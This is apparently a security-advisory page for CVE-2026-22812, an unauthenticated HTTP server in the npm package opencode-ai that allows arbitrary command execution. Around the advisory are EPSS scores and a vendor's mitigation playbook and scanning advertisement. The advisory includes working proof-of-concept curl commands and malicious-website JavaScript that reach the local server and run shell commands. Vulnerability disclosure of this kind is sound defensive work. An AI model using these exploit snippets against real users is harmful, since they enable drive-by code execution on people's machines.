Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
📦 npm

GHSA-vxw4-wv6m-9hhh

HIGH

OpenCode's Unauthenticated HTTP Server Allows Arbitrary Command Execution

Also known asCVE-2026-22812
Published
Jan 13, 2026
Updated
Feb 3, 2026
Affected
1 pkg
Patched
1 / 1
Exploits
None indexed

EPSS Exploitation Probability

via FIRST.org ↗
17.0%probability of exploitation in next 30 days
Moderate Risk97th percentile+11.63%
0.00%7.35%14.7%22.0%0.0%17.0%Feb 26May 26Jun 26

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

Blast Radius

1 pkg affected
📦opencode-ai

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects npm packages — download data is not available via public APIs for these ecosystems.

Description

Previously reported via email to [email protected] on 2025-11-17 per the security policy in opencode-sdk-js/SECURITY.md. No response received.

Summary

OpenCode automatically starts an unauthenticated HTTP server that allows any local process—or any website via permissive CORS—to execute arbitrary shell commands with the user's privileges.

Details

When OpenCode starts, it spawns an HTTP server (default port 4096+) with no authentication. Critical endpoints exposed:

  • POST /session/:id/shell - Execute shell commands (server.ts:1401)
  • POST /pty - Create interactive terminal sessions (server.ts:267)
  • GET /file/content?path= - Read arbitrary files (server.ts:1868)

The server is started automatically in cli/cmd/tui/worker.ts:36 via Server.listen().

No authentication middleware exists in server/server.ts. The server uses permissive CORS (.use(cors()) with default Access-Control-Allow-Origin: *), enabling browser-based exploitation.

PoC

Local exploitation:

API="http://127.0.0.1:4096"  # update with actual port
SESSION_ID=$(curl -s -X POST "$API/session" -H "Content-Type: application/json" -d '{}' | jq -r '.id')
curl -s -X POST "$API/session/$SESSION_ID/shell" -H "Content-Type: application/json" \
  -d '{"agent": "build", "command": "echo PWNED > /tmp/pwned.txt"}'
cat /tmp/pwned.txt  # outputs: PWNED

Browser-based exploitation:

A malicious website can exploit visitors who have OpenCode running. Confirmed working in Firefox. PoC available upon request.

// Malicious website JavaScript
fetch('http://127.0.0.1:4096/session', {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  body: '{}'
})
.then(r => r.json())
.then(session => {
  fetch(`http://127.0.0.1:4096/session/${session.id}/shell`, {
    method: 'POST',
    headers: {'Content-Type': 'application/json'},
    body: JSON.stringify({agent: 'build', command: 'id > /tmp/pwned.txt'})
  });
});

Note: Chrome 142+ may prompt for Local Network Access permission. Firefox does not.

Impact

Remote Code Execution via two vectors:

  1. Local process: Any malicious npm package, script, or compromised application can execute commands as the user running OpenCode.

  2. Browser-based (confirmed in Firefox): Any website can execute commands on visitors who have OpenCode running. This enables drive-by attacks via malicious ads, compromised websites, or phishing pages.

With --mdns flag, the server binds to 0.0.0.0 and advertises via Bonjour, extending the attack surface to the entire local network.

Code analysis, CVSS scoring, and documentation assisted by Claude AI (Opus 4.5). Vulnerability verification and PoC testing performed by the reporter.

Affected Packages

1 total 1 fixed
EcosystemPackageVulnerable rangeFix
📦npmopencode-aiall versions1.0.216

Detection & mitigation playbook

Open-source dependency

  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for opencode-ai. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

  2. Fix

    Update opencode-ai to 1.0.216 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-vxw4-wv6m-9hhh is resolved across your whole dependency graph.

  3. Workarounds

    If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

  4. How O3 protects you

    O3 pinpoints whether GHSA-vxw4-wv6m-9hhh is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-vxw4-wv6m-9hhh. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

*Previously reported via email to [email protected] on 2025-11-17 per the security policy in [opencode-sdk-js/SECURITY.md](https://github.com/sst/opencode-sdk-js/blob/main/SECURITY.md). No response received.* ### Summary OpenCode automatically starts an unauthenticated HTTP server that allows any local process—or any website via permissive CORS—to execute arbitrary shell commands with the user's privileges. ### Details When OpenCode starts, it spawns an HTTP server (default port 4096+) with no authentication. Critical endpoints exposed: - `POST /session/:id/shell` - Execute shell commands (
O3 Security · Impact-Aware SCA

Is GHSA-vxw4-wv6m-9hhh in your dependencies?

O3 detects GHSA-vxw4-wv6m-9hhh across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.

Scan my dependencies How O3 SCA works